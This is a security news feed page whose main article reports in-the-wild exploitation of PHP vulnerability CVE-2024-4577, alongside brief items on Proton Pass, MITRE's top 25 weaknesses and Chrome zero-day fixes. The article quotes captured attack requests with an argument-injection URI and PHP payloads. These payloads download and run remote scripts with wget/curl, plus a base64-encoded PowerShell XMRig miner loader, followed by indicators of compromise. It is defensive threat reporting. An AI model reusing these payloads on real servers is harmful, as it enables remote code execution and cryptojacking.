Proton makes its open source Proton Pass password manager globally available for major browsers and mobile devices.
The post Proton Launches Open Source Password Manager appeared first on SecurityWeek.
SecurityWeek RSS Feed
The all in one place for non-profit security aid.
Proton makes its open source Proton Pass password manager globally available for major browsers and mobile devices.
The post Proton Launches Open Source Password Manager appeared first on SecurityWeek.
SecurityWeek RSS Feed
Critical PHP Vulnerability CVE-2024-4577 Actively Exploited in the Wild
A critical vulnerability in PHP, tracked as CVE-2024-4577, is being actively exploited by threat actors in wild just days after its public disclosure in June 2024. The flaw affects PHP installations running in CGI mode, primarily on Windows systems using Chinese and Japanese language locales, though it may impact a wider range of setups.
The Akamai Security Intelligence Response Team (SIRT) has detected numerous exploit attempts targeting this vulnerability within 24 hours of its disclosure. The ease of exploitation has led to quick adoption by various threat actors.
“One of the factors in determining criticality is the ease of exploitation, and this one is pretty uncomplicated for a threat actor to execute. To achieve RCE, an attacker just needs to send PHP code to the server and have it be (mis)interpreted.” Akamai said.
“Is Your System Under Attack? Try Cynet XDR: Automated Detection & Response for Endpoints, Networks, & Users!”- Free Demo
Akamai researchers have observed the flaw being abused in multiple malware campaigns, including:
Gh0st RAT: A 15-year-old remote access tool was used in attacks originating from a server in Germany. The malware renamed itself and beaconed out to a command-and-control server.
RedTail Cryptominer: A cryptomining operation was detected abusing the vulnerability to retrieve and execute a shell script that downloads an x86 RedTail cryptomining malware.
Muhstik Malware: Another campaign downloaded a variant of Muhstik malware, which targets IoT devices and Linux servers for cryptomining and DDoS purposes.
XMRig: PowerShell was used to download and execute a script that spins up the XMRig cryptominer from a remote mining pool.
Within 24 hours of disclosure, SIRT observed Gh0st RAT malware attempts targeting this vulnerability. The malware, a UPX-packed Windows executable, beacons out to a Germany-based command and control server and renames itself to evade detection.
SIRT honeypots detected a RedTail cryptomining operation exploiting CVE-2024-4577. The attacker used a shell script to download and execute the cryptomining malware from a Russia-based IP address.
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
URI:
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
POST DATA:
<?php shell_exec(“SC=$(wget -O- http://185.172.128[.]93/sh || curl http://185.172.128[.]93/sh); echo “$SC” | sh -s cve_2024_4577″); ?>
Another campaign involved a shell script downloading Muhstik malware, which targets Internet of Things and Linux servers for cryptomining and distributed denial-of-service (DDoS) attacks.
User-Agent: python-requests/2.22
URI:
/?%ADd+allow_url_include%3D1+-d+auto_prepend_file%3Dphp://input
POST DATA:
<?php system(‘curl 86.48.2[.]49/3sh’)?>;echo 1337; die;
A fourth campaign involved XMRig, where PowerShell commands were used to download and execute a script to spin up the cryptominer from a remote mining pool.
URI:
/test.hello?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input
POST DATA (Base64 Encoded):
<?php $cmd=base64_decode(‘cG93ZXJzaGVsbCAtQ29tbWFuZCAiJHdjID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsgJHRlbXBmaWxlID0gW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcEZpbGVOYW1lKCk7ICR0ZW1wZmlsZSArPSAnLmJhdCc7ICR3Yy5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly9kb3dubG9hZC5jM3Bvb2wub3JnL3htcmlnX3NldHVwL3Jhdy9tYXN0ZXIvc2V0dXBfYzNwb29sX21pbmVyLmJhdCcsICR0ZW1wZmlsZSk7ICYgJHRlbXBmaWxlIDQ5dzhnc0x3N1V3VVZzelVCdFl1amROMU1jTmtvZVl1Y1RjdGFlUFg4bm1iaktBQnpKOVMxcmlnV2RoNUVpVVQxejROUEFQY2h4VDdSYUpYTjNmVVJVcE02RjZLR2p5OyBSZW1vdmUtSXRlbSAtRm9yY2UgJHRlbXBmaWxlIg==’);system($cmd) ?>
POST DATA (Base64 Decoded):
powershell -Command “$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += ‘.bat’; $wc.DownloadFile(‘http://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.bat’, $tempfile); & $tempfile 49w8gsLw7UwUVszUBtYujdN1McNkoeYucTctaePX8nmbjKABzJ9S1rigWdh5EiUT1z4NPAPchxT7RaJXN3fURUpM6F6KGjy; Remove-Item -Force $tempfile”
Akamai advises affected organizations to patch their systems swiftly and monitor for indicators of compromise (IOCs).
Those using manual mode should ensure the Command Injection Attack group or specific relevant rules are set to “Deny” mode. Akamai has observed a surge in scanning for this vulnerability and is continuing to monitor the situation closely.
Join our free webinar to learn about combating slow DDoS attacks, a major threat today.
A646ebf85afa29ae1c77458c575b5e4b0b145d813db028435d33b522edccdc0e
A646ebf85afa29ae1c77458c575b5e4b0b145d813db028435d33b522edccdc0e.exe
phps.exe
Iqgqosc.exe
147.50.253[.]109
146.19.100[.]7
23.237.182[.]122
147.50.253[.]220
147.50.253[.]222
147.50.253[.]225
147.50.253[.]219
147.50.253[.]231
147.50.253[.]99
147.50.253[.]100
147.50.253[.]228
147.50.253[.]5
147.50.253[.]4
154.197.12[.].156
147.50.253[.]110
147.50.253[.]102
147.50.253[.]218
147.50.253[.]23
147.50.253[.]11
147.50.253[.]163
147.50.253[.]2
147.50.253[.]116
147.50.253[.]18
147.50.253[.]109
147.50.253[.]106
147.50.253[.]112
147.50.253[.]111
147.50.253[.]7
147.50.253[.]104
147.50.253[.]167
147.50.253[.]119
147.50.253[.]113
147.50.253[.]103
147.50.253[.]107
147.50.253[.]105
147.50.253[.]114
147.50.253[.]108
147.50.253[.]101
147.50.253[.]117
147.50.253[.]115
147.50.229[.]12
T1091 — Replication Through Removable Media
T1547 — Boot or Logon Autostart Execution
T1056 — Input Capture
T1112 — Modify Registry
T1003 — OS Credential Dumping
T1120 — Peripheral Device Discovery
T1027 — Obfuscated Files or Information
T1071 — Application Layer Protocol
T1082 — System Information Discovery
T1571 — Non-Standard Port
T1057 — Process Discovery
185.172.128[.]93
2c602147c727621c5e98525466b8ea78832abe2c3de10f0b33ce9a4adea205eb
0d70a044732a77957eaaf28d9574d75da54ae430d8ad2e4049bd182e13967a6f
ab897157fdef11b267e986ef286fd44a699e3699a458d90994e020619653d2cd
9753df3ea4b9948c82310f64ff103685f78af85e3e08bb5f0d0d44047c63c315
19a06de9a8b66196fa6cc9e86824dee577e462cbeaf36d715c8fea5bcb08b54d
The post Critical PHP Vulnerability CVE-2024-4577 Actively Exploited in the Wild appeared first on Cyber Security News.
MITRE releases new list of top 25 most dangerous software bugs
MITRE shared today this year’s list of the top 25 most dangerous weaknesses plaguing software during the previous two years. […] Read More
BleepingComputer
Google fixes Chrome zero-days exploited at Pwn2Own 2024
Google fixed seven security vulnerabilities in the Chrome web browser on Tuesday, including two zero-days exploited during the Pwn2Own Vancouver 2024 hacking competition. […] Read More
BleepingComputer